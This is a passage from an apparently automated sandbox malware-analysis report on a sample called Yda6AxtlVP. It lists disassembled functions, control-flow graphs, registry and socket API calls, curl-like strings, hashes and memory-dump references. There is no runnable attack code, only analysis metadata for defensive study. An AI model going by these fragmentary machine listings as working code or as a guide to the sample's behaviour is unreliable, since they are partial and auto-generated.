                                                    • Associated: 00000000.00000002.1451552669.0000000001470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000180F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451877897.000000000181E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452000356.00000000019E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452020409.00000000019E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: QueryValue$Open$CloseEnum
                                                    • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                    • API String ID: 4217438148-1047472027
                                                    • Opcode ID: 9c6cf01f6571fc106ebb61405473ca3f02c09f916d1f32414ad803b0211d0384
                                                    • Instruction ID: 8d6ddbdf086678fcb3d9d19a25a244105c886132ba3dd4ee015f70c029eb7f44
                                                    • Opcode Fuzzy Hash: 9c6cf01f6571fc106ebb61405473ca3f02c09f916d1f32414ad803b0211d0384
                                                    • Instruction Fuzzy Hash: 8C72A2B1604305AFE320DB25DC81B5BB7E8AF85744F18582CF985EB2A1E771E984CB53
                                                    Function 00D8A550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00D8A832
                                                    Strings
                                                    • Couldn't bind to '%s' with errno %d: %s, xrefs: 00D8AE1F
                                                    • Local port: %hu, xrefs: 00D8AF28
                                                    • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 00D8AD0A
                                                    • Trying [%s]:%d..., xrefs: 00D8A689
                                                    • Trying %s:%d..., xrefs: 00D8A7C2, 00D8A7DE
                                                    • Name '%s' family %i resolved to '%s' family %i, xrefs: 00D8ADAC
                                                    • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00D8A6CE
                                                    • @, xrefs: 00D8AC42
                                                    • Local Interface %s is ip %s using address family %i, xrefs: 00D8AE60
                                                    • cf_socket_open() -> %d, fd=%d, xrefs: 00D8A796
                                                    • Could not set TCP_NODELAY: %s, xrefs: 00D8A871
                                                    • cf-socket.c, xrefs: 00D8A5CD, 00D8A735
                                                    • Bind to local port %d failed, trying next, xrefs: 00D8AFE5
                                                    • @, xrefs: 00D8A8F4
                                                    • bind failed with errno %d: %s, xrefs: 00D8B080
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    • Associated: 00000000.00000002.1450958835.0000000000D50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451552669.0000000001470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000180F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451877897.000000000181E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452000356.00000000019E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452020409.00000000019E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: setsockopt
                                                    • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                    • API String ID: 3981526788-2373386790
                                                    • Opcode ID: c32c65f55f5596d5f7bb2285501bde9f14bd90f2b397bf091ffb32aa8790cd5a
                                                    • Instruction ID: 2c17b3a948f5706948feb7a75a8350d0fa00553e08b7c93093b6252d7dc14364
                                                    • Opcode Fuzzy Hash: c32c65f55f5596d5f7bb2285501bde9f14bd90f2b397bf091ffb32aa8790cd5a
                                                    • Instruction Fuzzy Hash: BB62E471508341ABE725DF28C846BABB7E5FF81314F08491AF98897252E771E845CBB3
                                                    Function 00E19740 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 743registryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 862 e19740-e1975b 863 e19780-e19782 862->863 864 e1975d-e19768 call e178a0 862->864 866 e19914-e1994e call 10d8b70 RegOpenKeyExA 863->866 867 e19788-e197a0 call 10d8e00 call e178a0 863->867 873 e199bb-e199c0 864->873 874 e1976e-e19770 864->874 876 e19950-e19955 866->876 877 e1995a-e19992 RegQueryValueExA RegCloseKey call 10d8b98 866->877 867->873 879 e197a6-e197c5 867->879 880 e19a0c-e19a15 873->880 878 e19772-e1977e 874->878 874->879 876->880 892 e19997-e199b5 call e178a0 877->892 878->867 885 e19827-e19833 879->885 886 e197c7-e197e0 879->886 888 e19835-e1985c call e0e2b0 * 2 885->888 889 e1985f-e19872 call e15ca0 885->889 890 e197e2-e197f3 call 10d8b50 886->890 891 e197f6-e19809 886->891 888->889 903 e199f0 889->903 904 e19878-e1987d call e177b0 889->904 890->891 891->885 902 e1980b-e19810 891->902 892->873 892->879 902->885 907 e19812-e19822 902->907 906 e199f5-e199fb call e15d00 903->906 909 e19882-e19889 904->909 917 e199fe-e19a09 906->917 907->880 909->906 913 e1988f-e1989b call e04fe0 909->913 913->903 920 e198a1-e198c3 call 10d8b50 call e178a0 913->920 917->880 926 e199c2-e199ed call e0e2b0 * 2 920->926 927 e198c9-e198db call e0e2d0 920->927 926->903 927->926 932 e198e1-e198f0 call e0e2d0 927->932 932->926 938 e198f6-e19905 call e163f0 932->938 942 e19f66-e19f7f call e15d00 938->942 943 e1990b-e1990f 938->943 942->917 944 e19a3f-e19a5a call e16740 call e163f0 943->944 944->942 951 e19a60-e19a6e call e16d60 944->951 954 e19a70-e19a94 call e16200 call e167e0 call e16320 951->954 955 e19a1f-e19a39 call e16840 call e163f0 951->955 966 e19a16-e19a19 954->966 967 e19a96-e19ac6 call e0d120 954->967 955->942 955->944 966->955 968 e19fc1 966->968 973 e19ae1-e19af7 call e0d190 967->973 974 e19ac8-e19adb call e0d120 967->974 970 e19fc5-e19ffd call e15d00 call e0e2b0 * 2 968->970 970->917 973->955 981 e19afd-e19b09 call e04fe0 973->981 974->955 974->973 981->968 986 e19b0f-e19b29 call e0e730 981->986 991 e19f84-e19f88 986->991 992 e19b2f-e19b3a call e178a0 986->992 994 e19f95-e19f99 991->994 992->991 999 e19b40-e19b54 call e0e760 992->999 996 e19fa0-e19fb6 call e0ebf0 * 2 994->996 997 e19f9b-e19f9e 994->997 1009 e19fb7-e19fbe 996->1009 997->968 997->996 1005 e19f8a-e19f92 999->1005 1006 e19b5a-e19b6e call e0e730 999->1006 1005->994 1012 e19b70-e1a004 1006->1012 1013 e19b8c-e19b97 call e163f0 1006->1013 1009->968 1018 e1a015-e1a01d 1012->1018 1021 e19c9a-e19cab call e0ea00 1013->1021 1022 e19b9d-e19bbf call e16740 call e163f0 1013->1022 1019 e1a024-e1a045 call e0ebf0 * 2 1018->1019 1020 e1a01f-e1a022 1018->1020 1019->970 1020->970 1020->1019 1031 e19f31-e19f35 1021->1031 1032 e19cb1-e19ccd call e0ea00 call e0e960 1021->1032 1022->1021 1039 e19bc5-e19bda call e16d60 1022->1039 1034 e19f40-e19f61 call e0ebf0 * 2 1031->1034 1035 e19f37-e19f3a 1031->1035 1048 e19cfd-e19d0e call e0e960 1032->1048 1049 e19ccf 1032->1049 1034->955 1035->955 1035->1034 1039->1021 1051 e19be0-e19bf4 call e16200 call e167e0 1039->1051 1060 e19d10 1048->1060 1061 e19d53-e19d55 1048->1061 1052 e19cd1-e19cec call e0e9f0 call e0e4a0 1049->1052 1051->1021 1068 e19bfa-e19c0b call e16320 1051->1068 1073 e19d47-e19d51 1052->1073 1074 e19cee-e19cfb call e0e9d0 1052->1074 1066 e19d12-e19d2d call e0e9f0 call e0e4a0 1060->1066 1065 e19e69-e19e8e call e0ea40 call e0e440 1061->1065 1090 e19e90-e19e92 1065->1090 1091 e19e94-e19eaa call e0e3c0 1065->1091 1087 e19d5a-e19d6f call e0e960 1066->1087 1088 e19d2f-e19d3c call e0e9d0 1066->1088 1082 e19c11-e19c1c call e17b70 1068->1082 1083 e19b75-e19b86 call e0ea00 1068->1083 1078 e19dca-e19ddb call e0e960 1073->1078 1074->1048 1074->1052 1096 e19ddd-e19ddf 1078->1096 1097 e19e2e-e19e36 1078->1097 1082->1013 1109 e19c22-e19c33 call e0e960 1082->1109 1083->1013 1105 e19f2d 1083->1105 1119 e19d71-e19d73 1087->1119 1120 e19dc2 1087->1120 1088->1066 1116 e19d3e-e19d42 1088->1116 1101 e19eb3-e19ec4 call e0e9c0 1090->1101 1113 e19eb0-e19eb1 1091->1113 1114 e1a04a-e1a04c 1091->1114 1106 e19e06-e19e21 call e0e9f0 call e0e4a0 1096->1106 1102 e19e38-e19e3b 1097->1102 1103 e19e3d-e19e5b call e0ebf0 * 2 1097->1103 1101->955 1122 e19eca-e19ed0 1101->1122 1102->1103 1111 e19e5e-e19e67 1102->1111 1103->1111 1105->1031 1145 e19de1-e19dee call e0ec80 1106->1145 1146 e19e23-e19e2c call e0eac0 1106->1146 1132 e19c35 1109->1132 1133 e19c66-e19c75 call e178a0 1109->1133 1111->1065 1111->1101 1113->1101 1125 e1a057-e1a070 call e0ebf0 * 2 1114->1125 1126 e1a04e-e1a051 1114->1126 1116->1065 1127 e19d9a-e19db5 call e0e9f0 call e0e4a0 1119->1127 1120->1078 1130 e19ee5-e19ef2 call e0e9f0 1122->1130 1125->1009 1126->968 1126->1125 1160 e19d75-e19d82 call e0ec80 1127->1160 1161 e19db7-e19dc0 call e0eac0 1127->1161 1130->955 1154 e19ef8-e19f0e call e0e440 1130->1154 1140 e19c37-e19c51 call e0e9f0 1132->1140 1150 e1a011 1133->1150 1151 e19c7b-e19c8f call e0e7c0 1133->1151 1140->1013 1173 e19c57-e19c64 call e0e9d0 1140->1173 1164 e19df1-e19e04 call e0e960 1145->1164 1146->1164 1150->1018 1151->1013 1175 e19c95-e1a00e 1151->1175 1171 e19f10-e19f26 call e0e3c0 1154->1171 1172 e19ed2-e19edf call e0e9e0 1154->1172 1177 e19d85-e19d98 call e0e960 1160->1177 1161->1177 1164->1097 1164->1106 1171->1172 1188 e19f28 1171->1188 1172->955 1172->1130 1173->1133 1173->1140 1175->1150 1177->1120 1177->1127 1188->968
                                                    APIs
                                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00E19946
                                                    • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00E19974
                                                    • RegCloseKey.KERNELBASE(?), ref: 00E1998B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    • Associated: 00000000.00000002.1450958835.0000000000D50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451552669.0000000001470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000180F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451877897.000000000181E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452000356.00000000019E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452020409.00000000019E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: CloseOpenQueryValue
                                                    • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                                    • API String ID: 3677997916-4129964100
                                                    • Opcode ID: 70adc558e3ebf708d8e10a749277ffbf5de8ae986620a6b519ea6e5904e2e6ef
                                                    • Instruction ID: 5520c6368f808f3c8601c99da2cb595613a754e9e3f775af2dfcbea99a788ed0
                                                    • Opcode Fuzzy Hash: 70adc558e3ebf708d8e10a749277ffbf5de8ae986620a6b519ea6e5904e2e6ef
                                                    • Instruction Fuzzy Hash: 2132DAB19042016BEB11AB24EC52AAB76E4AF54318F085834FD49B7363FB31ED95C753
                                                    Function 00D88B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269networkCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1365 d88b50-d88b69 1366 d88b6b-d88b74 1365->1366 1367 d88be6 1365->1367 1369 d88beb-d88bf2 1366->1369 1370 d88b76-d88b8d 1366->1370 1368 d88be9 1367->1368 1368->1369 1371 d88b8f-d88ba7 call d66e40 1370->1371 1372 d88bf3-d88bfe call d8a550 1370->1372 1379 d88cd9-d88d16 SleepEx 1371->1379 1380 d88bad-d88baf 1371->1380 1377 d88de4-d88def 1372->1377 1378 d88c04-d88c08 1372->1378 1383 d88e8c-d88e95 1377->1383 1384 d88df5-d88e19 call d8a150 1377->1384 1381 d88dbd-d88dc3 1378->1381 1382 d88c0e-d88c1d 1378->1382 1401 d88d18-d88d20 1379->1401 1402 d88d22 1379->1402 1385 d88bb5-d88bb9 1380->1385 1386 d88ca6-d88cb0 1380->1386 1381->1368 1389 d88c1f-d88c30 connect 1382->1389 1390 d88c35-d88c48 call d8a150 1382->1390 1387 d88f00-d88f06 1383->1387 1388 d88e97-d88e9c 1383->1388 1422 d88e88 1384->1422 1423 d88e1b-d88e26 1384->1423 1385->1369 1393 d88bbb-d88bc2 1385->1393 1386->1379 1391 d88cb2-d88cb8 1386->1391 1387->1369 1395 d88e9e-d88eb6 call d62a00 1388->1395 1396 d88edf-d88eef call d578b0 1388->1396 1389->1390 1421 d88c4d-d88c4f 1390->1421 1397 d88ddc-d88dde 1391->1397 1398 d88cbe-d88cd4 call d8b180 1391->1398 1393->1369 1400 d88bc4-d88bcc 1393->1400 1395->1396 1420 d88eb8-d88edd call d63410 * 2 1395->1420 1425 d88ef2-d88efc 1396->1425 1397->1368 1397->1377 1398->1377 1406 d88bce-d88bd2 1400->1406 1407 d88bd4-d88bda 1400->1407 1409 d88d26-d88d39 1401->1409 1402->1409 1406->1369 1406->1407 1407->1369 1414 d88bdc-d88be1 1407->1414 1417 d88d3b-d88d3d 1409->1417 1418 d88d43-d88d61 call d6d8c0 call d8a150 1409->1418 1424 d88dac-d88db8 call d950a0 1414->1424 1417->1397 1417->1418 1440 d88d66-d88d74 1418->1440 1420->1425 1428 d88c8e-d88c93 1421->1428 1429 d88c51-d88c58 1421->1429 1422->1383 1430 d88e28-d88e2c 1423->1430 1431 d88e2e-d88e85 call d6d090 call d94fd0 1423->1431 1424->1369 1425->1387 1433 d88dc8-d88dd9 call d8b100 1428->1433 1434 d88c99-d88c9f 1428->1434 1429->1428 1437 d88c5a-d88c62 1429->1437 1430->1422 1430->1431 1431->1422 1433->1397 1434->1386 1441 d88c6a-d88c70 1437->1441 1442 d88c64-d88c68 1437->1442 1440->1369 1446 d88d7a-d88d81 1440->1446 1441->1428 1448 d88c72-d88c8b call d950a0 1441->1448 1442->1428 1442->1441 1446->1369 1450 d88d87-d88d8f 1446->1450 1448->1428 1454 d88d9b-d88da1 1450->1454 1455 d88d91-d88d95 1450->1455 1454->1369 1458 d88da7 1454->1458 1455->1369 1455->1454 1458->1424
                                                    APIs
                                                    • connect.WS2_32(?,?,00000001), ref: 00D88C30
                                                    • SleepEx.KERNELBASE(00000000,00000000), ref: 00D88CF3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    • Associated: 00000000.00000002.1450958835.0000000000D50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451552669.0000000001470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000180F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451877897.000000000181E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452000356.00000000019E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452020409.00000000019E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: Sleepconnect
                                                    • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                    • API String ID: 238548546-879669977
                                                    • Opcode ID: 3fe0c8749aade0f546b2a1919fad80907dbba2fb55b766d430c93cc66ae4ceb7
                                                    • Instruction ID: 7df49e8b3d57a58087feea5205b14c2dba1322bcc7e161f55a1acc5facdaf177
                                                    • Opcode Fuzzy Hash: 3fe0c8749aade0f546b2a1919fad80907dbba2fb55b766d430c93cc66ae4ceb7
                                                    • Instruction Fuzzy Hash: 7BB1BE70604306AFDB10EF24C885BA6B7E4AF85318F58852DE8998B292DB71EC54D772
                                                    Function 00D52F17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144registryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1459 d52f17-d52f8c call 1235d30 call 1236120 1464 d531c9-d531cd 1459->1464 1465 d52f91-d52ff4 call d51619 RegOpenKeyExA 1464->1465 1466 d531d3-d531d6 1464->1466 1469 d531c5 1465->1469 1470 d52ffa-d5300b 1465->1470 1469->1464 1471 d5315c-d531ac RegEnumKeyExA 1470->1471 1472 d53010-d53083 call d51619 RegOpenKeyExA 1471->1472 1473 d531b2-d531c2 1471->1473 1477 d5314e-d53152 1472->1477 1478 d53089-d530d4 RegQueryValueExA 1472->1478 1473->1469 1477->1471 1479 d530d6-d53137 call 1236000 call 1236090 call 1236120 call 1235f30 call 1236120 call 1234490 1478->1479 1480 d5313b-d5314b RegCloseKey 1478->1480 1479->1480 1480->1477
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    • Associated: 00000000.00000002.1450958835.0000000000D50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451552669.0000000001470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000180F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451877897.000000000181E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452000356.00000000019E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452020409.00000000019E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: EnumOpen
                                                    • String ID: d
                                                    • API String ID: 3231578192-2564639436
                                                    • Opcode ID: 2437102195dfee9d89c45b9612a62d7c0282bec1fdaae92fadcc5e3aab247522
                                                    • Instruction ID: ac751b7e1c66c92e11cebf99d5d1292dede658f286321b4d06db146300a9cc48
                                                    • Opcode Fuzzy Hash: 2437102195dfee9d89c45b9612a62d7c0282bec1fdaae92fadcc5e3aab247522
                                                    • Instruction Fuzzy Hash: 4C71C2B490430A9FDB14DF69C58479EBBF0FF84318F10896DE89897314E7749A888F92
                                                    Function 00D89290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1493 d89290-d892ed call d576a0 1496 d893c3-d893ce 1493->1496 1497 d892f3-d892fb 1493->1497 1506 d893d0-d893e1 1496->1506 1507 d893e5-d89427 call d6d090 call d94f40 1496->1507 1498 d893aa-d893af 1497->1498 1499 d89301-d89333 call d6d8c0 call d6d9a0 1497->1499 1500 d893b5-d893bc 1498->1500 1501 d89456-d89470 1498->1501 1519 d89335-d89364 WSAIoctl 1499->1519 1520 d893a7 1499->1520 1504 d89429-d89431 1500->1504 1505 d893be 1500->1505 1509 d89439-d8943f 1504->1509 1510 d89433-d89437 1504->1510 1505->1501 1506->1500 1511 d893e3 1506->1511 1507->1501 1507->1504 1509->1501 1514 d89441-d89453 call d950a0 1509->1514 1510->1501 1510->1509 1511->1501 1514->1501 1521 d8939b-d893a4 1519->1521 1522 d89366-d8936f 1519->1522 1520->1498 1521->1520 1522->1521 1525 d89371-d89390 setsockopt 1522->1525 1525->1521 1526 d89392-d89395 1525->1526 1526->1521
                                                    APIs
                                                    • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00D8935D
                                                    • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00D89389
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    • Associated: 00000000.00000002.1450958835.0000000000D50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.0000000001305000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451008904.000000000146D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451552669.0000000001470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000180F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451570120.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1451877897.000000000181E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452000356.00000000019E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1452020409.00000000019E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: Ioctlsetsockopt
                                                    • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                    • API String ID: 1903391676-2691795271
                                                    • Opcode ID: c5a1a4a89584210656122dea8d674e91a0bcf2753b48062d03f69e1f6be0b7ed
                                                    • Instruction ID: 68097404b58f7c1d400eaeb86271a694e3a759e1b665fab5538ec62563bd7147
                                                    • Opcode Fuzzy Hash: c5a1a4a89584210656122dea8d674e91a0bcf2753b48062d03f69e1f6be0b7ed
                                                    • Instruction Fuzzy Hash: 0C51E571A04305AFDB14EF24C895FBAB7A5FF85314F188529FD888B282E730E951C7A1
                                                    Function 00D576A0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 73networkCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
